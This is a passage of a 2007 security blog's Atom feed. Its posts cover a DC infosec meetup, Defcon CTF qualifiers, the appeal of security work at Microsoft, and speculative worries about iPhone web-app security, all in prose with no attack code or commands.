NW&lt;br /&gt;Washington, &lt;span class="caps"&gt;DC 20037&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;a title="Google Map to Brickskeller" href="http://maps.google.com/maps?f=q&amp;hl=en&amp;amp;q=Brickskeller&amp;sll=38.909985,-77.048782&amp;amp;sspn=0.029186,0.026093&amp;ie=UTF8&amp;amp;latlng=38909985,-77048784,16283471360474262209&amp;ei=tcV6RsvINo3crQK9rpSvBA&amp;amp;cd=1"&gt;Google Map&lt;/a&gt; &lt;/p&gt;I'm stoked for this meeting. It should be a good time to meet up with a bunch of actual, no BS, infosec folks who care more about tech than they do about their CISSP number.
So come on out and join up, it should be a great experience.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-439042608796007959?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/439042608796007959/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=439042608796007959" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/439042608796007959?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/439042608796007959?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/06/capsec-tonight.html" title="CapSec Tonight!" /><author><name>Scott J. 
Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;Ak8MSHY_fSp7ImA9WB5RGE8.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-7816626261897025951</id><published>2007-06-25T18:56:00.000-05:00</published><updated>2007-06-25T22:34:49.845-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-06-25T22:34:49.845-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="challenge" /><category scheme="http://www.blogger.com/atom/ns#" term="threat analysis" /><category scheme="http://www.blogger.com/atom/ns#" term="op/ed" /><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="job" /><title>Bad Reputation vs Bad Assumptions</title><content type="html">&lt;div style="text-align: justify;"&gt;I was wandering through my blog list today and, by way of the ever enjoyable &lt;a href="http://techbuddha.wordpress.com/2007/06/24/the-worst-jobs-in-science-2007-6-microsoft-security-grunt/"&gt;Observations of a Digitally Enlightened Mind&lt;/a&gt;, came across an interesting but, in my opinion, totally unfounded and flawed article related to security.&lt;br /&gt;&lt;/div&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_M_lsvl0Qrg4/RoB61bXvjHI/AAAAAAAAABE/hIQ6v8wNvR0/s1600-h/Picture+1.png"&gt;&lt;/a&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;The article in question is one where &lt;a href="http://www.popsci.com/popsci/"&gt;PopSci&lt;/a&gt; published a list of the &lt;a href="http://www.popsci.com/popsci/science/0203101256a23110vgnvcm1000004eecbccdrcrd.html"&gt;10 Worst Jobs in Science&lt;/a&gt;. 
Many of them are truly awful and I wouldn't wish them on my worst enemy. Mind numbingly, stomach turningly bad. It was &lt;a href="http://www.popsci.com/popsci/science/0203101256a23110vgnvcm1000004eecbccdrcrd/5.html"&gt;#6&lt;/a&gt;, nearly halfway down a terrifying list, that the job in question was described.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;img style="text-align: justify;float: left; margin-top: 0px; margin-right: 10px; margin-bottom: 10px; margin-left: 0px; cursor: pointer; " src="http://bp2.blogger.com/_M_lsvl0Qrg4/RoB61bXvjHI/AAAAAAAAABE/hIQ6v8wNvR0/s320/Picture+1.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5080195437972917362" /&gt;&lt;div style="text-align: justify;"&gt;Now I've been a Microsoft hater in my day, no question. As a security type person they've been quite the headache at various times, and as an Apple fan I don't really find it an enjoyable system to use. That being said if Microsoft were to track me down and ask if I was interested in a job working with their security teams I'd jump at it. &lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Now the article is very correct about one aspect of it. Microsoft does wear a big "Hack Me" sign. It'd be nonstop pandemonium. Attacks at every angle, computer criminals gunning for you every day. If it's not the operating system it's the office suite, if it's not the office suite, it's the browser. There are few pieces of code attacked as aggressively as Microsoft's; it comes with the territory when you dominate the marketplace in so many genres the way they do.
Microsoft should wear that "Hack Me" sign proudly, maybe with a big gold chain (that they can afford) and some &lt;a href="http://en.wikipedia.org/wiki/Bling-bling"&gt;bling&lt;/a&gt; letters.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;So yes, under attack constantly. While I can't speak for anyone else that's exactly why I'd want to work for them, and I think that's perfectly natural. Surgeons may not like people being sick or hurt, but they sure enjoy cutting them open, or so I'm told (by my uncle who is one). It's the same with information security. A week (like the past couple) with few large threats gets dull quickly. Now the week when the &lt;a href="http://www.microsoft.com/technet/security/Bulletin/MS07-017.mspx"&gt;ANI attacks&lt;/a&gt; came out, that was fun. Would working for Microsoft be easy? Not in the least but rarely do people learn when they're "safe". They don't grow without challenges.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;If I wanted easy I'd go be a security guy for a small mom and pop somewhere, nice and safe, with a small number of supported apps, a smaller number of machines, and five users I could personally beat for being stupid. The &lt;a href="http://www.microsoft.com/"&gt;Microsoft&lt;/a&gt;'s, &lt;a href="http://amazon.com/"&gt;Amazon&lt;/a&gt;'s, &lt;a href="http://en.www.mozilla.com/en/"&gt;Mozilla&lt;/a&gt;'s, government groups and financials are in the thick of it, defending dozens of complex pieces of software, hundreds of thousands of machines, and billions of dollars. 
The Internet is a very dangerous place for groups like those and I believe that's the most attractive reason to work for them.&lt;/div&gt;&lt;div&gt; &lt;/div&gt;&lt;div&gt;&lt;div&gt; &lt;/div&gt;&lt;div&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-7816626261897025951?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/7816626261897025951/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=7816626261897025951" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/7816626261897025951?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/7816626261897025951?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/06/bad-reputation-vs-bad-assumptions.html" title="Bad Reputation vs Bad Assumptions" /><author><name>Scott J. 
Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://bp2.blogger.com/_M_lsvl0Qrg4/RoB61bXvjHI/AAAAAAAAABE/hIQ6v8wNvR0/s72-c/Picture+1.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></entry><entry gd:etag="W/&quot;CEUEQn06eCp7ImA9WB5RFkk.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-4186319330259323925</id><published>2007-06-23T11:48:00.001-05:00</published><updated>2007-06-23T18:43:23.310-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-06-23T18:43:23.310-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="comments" /><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="people" /><category scheme="http://www.blogger.com/atom/ns#" term="information warfare" /><category scheme="http://www.blogger.com/atom/ns#" term="rants" /><title>A different take on Information Warfare...</title><content type="html">Always understated and insightful I really recommend checking out Michael's recent &lt;a href="http://mcwresearch.com/archives/496"&gt;article on Information Warfare&lt;/a&gt; over at &lt;a href="http://mcwresearch.com"&gt;MCWResearch&lt;/a&gt;. Now I'll admit I really enjoy exploring the topic of Information Warfare, and I'm also quick to admit that I like that Michael seems to share my take that information warfare is coming for us all, government and corporation alike, and so it's time, as Michael put it, to "...start digging trenches."&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;I realize my reaction to this subject is to get too fired up for most people to take seriously. It's a failing of mine, but I'm passionate about this and can't help it. 
I truly feel that all of us, from every mom and pop company to Fortune 500s to home users, are going to be combatants, either innocent, unwitting, or otherwise, in information warfare, and we need to prepare accordingly. Packets don't often kill people directly and kill -9 rarely has a physical effect on structures, and thus it's easy to dismiss what nation states do in the farthest reaches of the Internet as hardly being "warfare" but it's ludicrous to think that it can't have real world ramifications.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;I'm already getting too far up on my soapbox, so again, I really recommend checking out the post at MCWResearch, it's really good stuff.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-4186319330259323925?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/4186319330259323925/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=4186319330259323925" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/4186319330259323925?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/4186319330259323925?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/06/different-take-on-information-warfare.html" title="A different take on Information Warfare..." /><author><name>Scott J. 
Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></entry><entry gd:etag="W/&quot;DUcFRH07fCp7ImA9WB5SF0o.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-3992900350821889379</id><published>2007-06-13T19:20:00.000-05:00</published><updated>2007-06-13T18:23:35.304-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-06-13T18:23:35.304-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="javascript" /><category scheme="http://www.blogger.com/atom/ns#" term="shmoocon" /><category scheme="http://www.blogger.com/atom/ns#" term="threat analysis" /><category scheme="http://www.blogger.com/atom/ns#" term="op/ed" /><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="development" /><category scheme="http://www.blogger.com/atom/ns#" term="webapps" /><category scheme="http://www.blogger.com/atom/ns#" term="jikto" /><category scheme="http://www.blogger.com/atom/ns#" term="wireless" /><category scheme="http://www.blogger.com/atom/ns#" term="mobiles" /><category scheme="http://www.blogger.com/atom/ns#" term="apple" /><title>iPhone sounds alot like iPwn</title><content type="html">&lt;div style="text-align: justify;"&gt;So as a fairly enthusiastic &lt;a href="http://www.apple.com/"&gt;Apple&lt;/a&gt; fan I've been getting asked  often how excited I am for the &lt;a href="http://www.apple.com/iphone/"&gt;iPhone&lt;/a&gt; ("Very"), am I going to get one ("prolly sometime in July"), and if I think it will be that great ("I do"). 
With someone of a basic technology background this is usually followed by some question about applications, SDKs, and if I think Apple will open it up ("I do") to third party development.&lt;br /&gt;&lt;br /&gt;My overall take on it? I've had a number of smartphones and aside from making calls I mostly just used the browser. As for other applications after a few that I tried for experimenting I found I rarely used others, just sticking to the basic software that was included, and even that little enough.&lt;br /&gt;&lt;br /&gt;As for the iPhone I truly believe that the killer app will be &lt;a href="http://www.apple.com/safari/"&gt;Safari&lt;/a&gt; itself, if it's all that Steve has tried to demonstrate it, may or may not, be cracked up to be. I'm not really sure what applications the developers who are attacking Apple for not providing an SDK think they'll create. In the years of &lt;a href="http://www.palm.com/us/"&gt;Palm&lt;/a&gt;/&lt;a href="http://www.microsoft.com/windowsmobile/default.mspx"&gt;Windows Mobile&lt;/a&gt;/&lt;a href="http://www.symbian.com/"&gt;Symbian&lt;/a&gt;/&lt;a href="http://www.blackberry.com/"&gt;Blackberry&lt;/a&gt; smart phones I've yet to see an app that overwhelms the function of a phone to make calls, text message, and maybe, if you're lucky, get email or browse the web. All of these are functions the iPhone will do out of the box. Even on my MacBook many of the most important things I do, blogging, reading RSS feeds, getting security news, are all things done in the web browser alone. What app are Apple devs just dying for the chance to make?&lt;br /&gt;&lt;br /&gt;Now that multi paragraph rant is not to suggest I'm peachy about the whole thing. This is a security blog after all. By not creating an SDK for creating true applications or widgets, and instead relying on Javascript/Ajax (as though you can have one without the other) you lead to a new problem, web pages can have amazing integration with your personal phone. 
Let me rephrase that: Advanced applications, running from remote servers, with both instructions and data, that's been shown already to have concerning security issues, will be able to run on your iPhone, and have, in some way, access to your address book, iTunes, and the ability to make phone calls. How was this a good idea?&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_M_lsvl0Qrg4/RnBxJrXvjFI/AAAAAAAAAA0/qurh0A7xgQk/s1600-h/stevejobsipwn.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 243px; height: 243px;" src="http://bp3.blogger.com/_M_lsvl0Qrg4/RnBxJrXvjFI/AAAAAAAAAA0/qurh0A7xgQk/s320/stevejobsipwn.jpg" alt="" id="BLOGGER_PHOTO_ID_5075681191121620050" border="0" /&gt;&lt;/a&gt;One of the few inherent security mechanisms built into web browsers is that they, to some extent, exist in a sandbox. Most of the time Javascript can't access the OS file system, it can't control applications other than the browser, it can't access system resources, and all those are only most of the time. There are plenty of side effects to current web technology that make a security researcher pull their hair out, and that's all in the sandbox. &lt;a href="http://www.memestreams.net/users/acidus/"&gt;Billy Hoffman&lt;/a&gt;'s &lt;a href="http://www.shmoocon.org/"&gt;Shmoocon&lt;/a&gt; &lt;a href="http://www.shmoocon.org/2007/videos/JavaScript%20Malware%20for%20a%20Grey%20Goo%20Tomorrow%20-%20Billy%20Hoffman.mp4"&gt;presentation&lt;/a&gt; discussed many of these, from keylogging to his own technique for web scanning using just Javascript and his particular brand of maniacal thought.&lt;br /&gt;&lt;br /&gt;It would seem, based on current information, Apple is deliberately adding such features creating a potential security nightmare, deliberately adding the ability for web applications to circumvent the sandbox. So what will happen?
XSS attacks that rewrite your address book? A hidden iframe that calls 911 for you? Who knows really, but when "webapps" can access system functions it's hard to imagine it staying innocent. Now it's very possible, and I'm in fact hopeful, that Apple has considered these things and put protections into place, but even so it is easy to suppose that this would be a thin veil of separation, and the possibility for misuse could easily be close to the surface.&lt;br /&gt;&lt;br /&gt;For a company like Apple, who so often touts their &lt;a href="http://movies.apple.com/movies/us/apple/getamac/apple-getamac-security_480x376.mov"&gt;security&lt;/a&gt; &lt;a href="http://movies.apple.com/movies/us/apple/getamac_ads1/viruses_480x376.mov"&gt;record&lt;/a&gt; (no I will not digress into a discussion of Safari now (but yeah, wow, 2 code execution vulnerabilities in a day?)), to not aggressively market that aspect makes me wonder how much consideration that aspect of design received.  All of this is obviously speculating the worst, but Apple has messaged little to nothing about the security features of the iPhone, leaving everyone to evaluate what they see. And based on what we see of the iPhone's design what else are security researchers to assume?&lt;br /&gt;&lt;br /&gt;Or maybe I'm the only one who is worried about all this.... 
well, there's also &lt;a href="http://www.memestreams.net/users/acidus/blogid1358547/"&gt;Billy&lt;/a&gt;.&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-3992900350821889379?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/3992900350821889379/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=3992900350821889379" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/3992900350821889379?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/3992900350821889379?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/06/iphone-sounds-alot-like-ipwn.html" title="iPhone sounds alot like iPwn" /><author><name>Scott J. 
Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://bp3.blogger.com/_M_lsvl0Qrg4/RnBxJrXvjFI/AAAAAAAAAA0/qurh0A7xgQk/s72-c/stevejobsipwn.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total></entry><entry gd:etag="W/&quot;CUQFSX8-eCp7ImA9WB5SFU0.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-3928560282071402336</id><published>2007-06-10T14:01:00.000-05:00</published><updated>2007-06-10T14:21:58.150-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-06-10T14:21:58.150-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="challenge" /><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="people" /><category scheme="http://www.blogger.com/atom/ns#" term="movies" /><category scheme="http://www.blogger.com/atom/ns#" term="reverse engineering" /><category scheme="http://www.blogger.com/atom/ns#" term="webapps" /><category scheme="http://www.blogger.com/atom/ns#" term="international" /><category scheme="http://www.blogger.com/atom/ns#" term="defcon" /><category scheme="http://www.blogger.com/atom/ns#" term="cons" /><title>And the answers please...</title><content type="html">&lt;div  style="text-align: justify;font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;Over at &lt;a href="http://nopsr.us/"&gt;Nopsr.us&lt;/a&gt; the Underminers (aka 1@stPlace, winners of last year's &lt;a href="http://www.defcon.org/"&gt;Defcon&lt;/a&gt; CTF) have put up a follow up to last year's CTF quals writeup, which you can find &lt;a href="http://nopsr.us/ctf2007prequal/"&gt;here.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;@tlas and his gang do a fantastic job walking through each of the challenges, and a 
lot can be learned from just taking a look. Even better, they managed to pry the challenge source code out of &lt;a href="http://kenshoto.com/"&gt;Kenshoto&lt;/a&gt;'s hands (a feat they managed to pull off before I did) and have it posted, so that nearly the entire scenario can be recreated for ownage pleasure in your very own home. So go give it a look, you'll learn a bunch.&lt;br /&gt;&lt;br /&gt;For those who are curious, Vulnerable Minds did play this year and were quite pleased with our 30 out of 160 finish. In what is the largest Defcon qualification year ever we were stoked to come in the top fifth and had an awesome time. ev3, Narc, LogicX, Bacon, Gpmidi, Bacchus, and myself spent most of the weekend at Akolyte and Saijak's apt, chugging Red Bull, watching Jurassic Park on repeat (seriously Pwnage100 was crap), and hacking to our hearts' content. It was a great weekend, the challenges were excellent, tough but enjoyable, and it was one of the most fun and interesting events I've been a part of.&lt;br /&gt;&lt;br /&gt;So props to the Kenshoto guys for a fantastic quals round, to the NopsR.Us/Underminers/1@stplace guys for the fantastic writeups, and to the Minds who dedicated their weekend to playing a fantastic game.&lt;br /&gt;&lt;br /&gt;And watch out next year because &lt;insidejoke&gt;Vulnerable Minds is coming to break all of your plates!&lt;/insidejoke&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-3928560282071402336?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/3928560282071402336/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=3928560282071402336" title="0 Comments" /><link rel="edit" type="application/atom+xml" 
href="http://www.blogger.com/feeds/3647430684627927763/posts/default/3928560282071402336?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/3928560282071402336?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/06/and-answers-please.html" title="And the answers please..." /><author><name>Scott J. Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;DkIBSHs4cSp7ImA9WB5TFUo.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-8372924103500377249</id><published>2007-05-26T17:08:00.000-05:00</published><updated>2007-05-30T20:22:39.539-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-05-30T20:22:39.539-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="challenge" /><category scheme="http://www.blogger.com/atom/ns#" term="defcon" /><category scheme="http://www.blogger.com/atom/ns#" term="cons" /><title>Love of the game.</title><content type="html">So! The qualifying round of DefCon's infamous Capture the Flag competition is this weekend. I'm excited, and not just because this would be my first CtF experience. The synergy (more or less) of people coming together with different experiences, knowledge, and ways of looking at problems could prove to be a great way to delve deeper into the field of code and code manipulation. (Let's be honest here, when it comes down to it, this is less about offense or defense and more about mental technique.)&lt;br /&gt;&lt;br /&gt;This weekend, a group of us will be sharing one apartment, eating each other's food, hacking to the point of exhaustion... 
I can't think of a better way to spend a random summer weekend, but that could just be me. ;)&lt;br /&gt;&lt;br /&gt;In preparation, I've been looking over &lt;a href="http://nopsr.us/ctf2006prequal/instructions.txt"&gt;last year's quals&lt;/a&gt;, helpfully posted by last year's team 1@stPlace. I think one of the things that blew me away was the wide range of topics presented, and the variety of exploitable things. XSS? Bitstream analysis? Reverse engineering protocols? Stealing entangled qbits? OK, just kidding about that last one, but it goes to show what an awesome, diverse field infosec can be. And as much as this is about hacking and having fun, I can only wonder what future DefCon CTFs may hold, especially with the dominance of mobile computing...&lt;br /&gt;&lt;br /&gt;But the future can wait. This weekend, let teh funz beg!n.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-8372924103500377249?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="related" href="http://kenshoto.com/" title="Love of the game." /><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/8372924103500377249/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=8372924103500377249" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/8372924103500377249?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/8372924103500377249?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/05/love-of-game.html" title="Love of the game." 
/><author><name>Alice</name><email>noreply@blogger.com</email></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></entry><entry gd:etag="W/&quot;DEACSHw-fyp7ImA9WB5TEk0.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-7845336797856443035</id><published>2007-05-23T08:58:00.000-05:00</published><updated>2007-05-26T14:12:49.257-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-05-26T14:12:49.257-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="education" /><category scheme="http://www.blogger.com/atom/ns#" term="people" /><category scheme="http://www.blogger.com/atom/ns#" term="international" /><category scheme="http://www.blogger.com/atom/ns#" term="cons" /><title>Getting Involved: CitySec, OWASP, and SUGs! O MY!</title><content type="html">&lt;div style="text-align: justify;"&gt;It's been an amazingly busy time for the Vulnerable Minds. Plans for &lt;a href="http://www.defcon.org/"&gt;Defcon,&lt;/a&gt; &lt;a href="http://kenshoto.com/"&gt;CTF&lt;/a&gt;, Projects, papers, all of them are sucking up time. I have had multiple blog posts in the queue waiting to be finished and posted in all their glory, but I wanted to make a quick post to highlight something that's been important to me lately.&lt;br /&gt;&lt;br /&gt;The image of the lonely hacker in a basement is quickly disproved as soon as you meet the very social characters that make up most of the hacking community. As happy as they are sitting around hacking on a neat piece of code they're just as happy going out for a beer and talking about that piece of code with others who share their interests. 
Any conference is as much about the old friends you meet up with and the new friends you'll make as it is about the technical knowledge you'll gain.&lt;br /&gt;&lt;br /&gt;Cons are, depending on your travel schedule and availability, few and far between for most, and as a result smaller interest groups have been forming all over the country to support the desire many hackers/infosec professionals have to mix with their peers, share ideas, network, socialize, and just generally cause trouble. Much like 2600 a few years ago, these groups seek to give people those opportunities.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.matasano.com/log"&gt;Thomas Ptacek&lt;/a&gt; has been a huge proponent of these groups, and as such has organized &lt;a href="http://citysec.org/"&gt;CitySec&lt;/a&gt;, a small bulletin board meant to help form and nurture such groups, which I've been happy to be involved in, advocating a Washington DC meetup. Well before the CitySec site was even live, &lt;a href="http://taosecurity.blogspot.com/"&gt;Richard Bejtlich&lt;/a&gt;, along with other security professionals, started &lt;a href="http://novasec.blogspot.com/"&gt;NoVASec&lt;/a&gt; (Northern Virginia) as a group where those interested in pure security, less interested in discussing their CISSP number and GIAC scores and more into talking about what they're actually doing, could meet and talk about security. NoVASec has been excellent, just a bit of a stretch to get to as it's usually fairly far outside Washington DC proper.&lt;br /&gt;&lt;br /&gt;Many other groups are also meeting regularly. &lt;a href="http://www.owasp.org/"&gt;OWASP&lt;/a&gt; has regular meetings, such as those in &lt;a href="http://www.owasp.org/index.php/Washington_DC"&gt;Washington DC&lt;/a&gt;, in various cities for developers, admins, and security folks interested in webapp security. 
For those more of the CISSP/Security Management mindset there are groups like &lt;a href="http://www.issa-nova.org/"&gt;ISSA-NoVA&lt;/a&gt;. The black or grey hat oriented crowd still has more than a few chapters of 2600 that still seem to &lt;a href="http://www.2600.com/meetings/"&gt;meet&lt;/a&gt;, though I gather they're waning a bit. I'm also known to show up at a &lt;a href="http://snort.org/community/usergroups.html"&gt;Snort Users Group&lt;/a&gt; meeting or two, though sadly the NoVA group hasn't had a meeting in a few months. Even many colleges are getting involved, with groups like the Penn State Information Assurance Club, and a similar club at RIT whose name I completely fail to remember.&lt;br /&gt;&lt;br /&gt;I guess what I'm trying to say is that it's great to see the community that's coming up around various areas of the security field, and I've been happy, and encourage others in the security community, to get involved.  I speak from experience when I say many of them are just as much fun as the larger conferences, and make great places to make new friends, make contacts, have a good beer, and occasionally learn something.&lt;br /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/7845336797856443035/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=7845336797856443035" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/7845336797856443035?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/7845336797856443035?v=2" /><link 
rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/05/getting-involved-citysec.html" title="Getting Involved: CitySec, OWASP, and SUGs! O MY!" /><author><name>Scott J. Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;DE8MQX8zeSp7ImA9WBFaFk0.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-2160007810901549525</id><published>2007-05-19T15:25:00.001-05:00</published><updated>2007-05-19T15:34:40.181-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-05-19T15:34:40.181-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="threat analysis" /><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="education" /><category scheme="http://www.blogger.com/atom/ns#" term="development" /><category scheme="http://www.blogger.com/atom/ns#" term="project tango" /><category scheme="http://www.blogger.com/atom/ns#" term="webapps" /><title>Time for a Tango</title><content type="html">Well I've had a number of people curious about &lt;a href="http://blog.vulnerableminds.com/2007/05/project-tango.html"&gt;Project Tango&lt;/a&gt;. It's been going for a little over a week now, much of the initial work has been completed, and now I'm in the process of tuning some of the back end pieces for finalization and release.&lt;br /&gt;&lt;br /&gt;So at this point I'm asking for some help, and in the process am going to give away a few things about the project, so here ya go:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Are you a security professional who's an information junkie? Shoot me an email 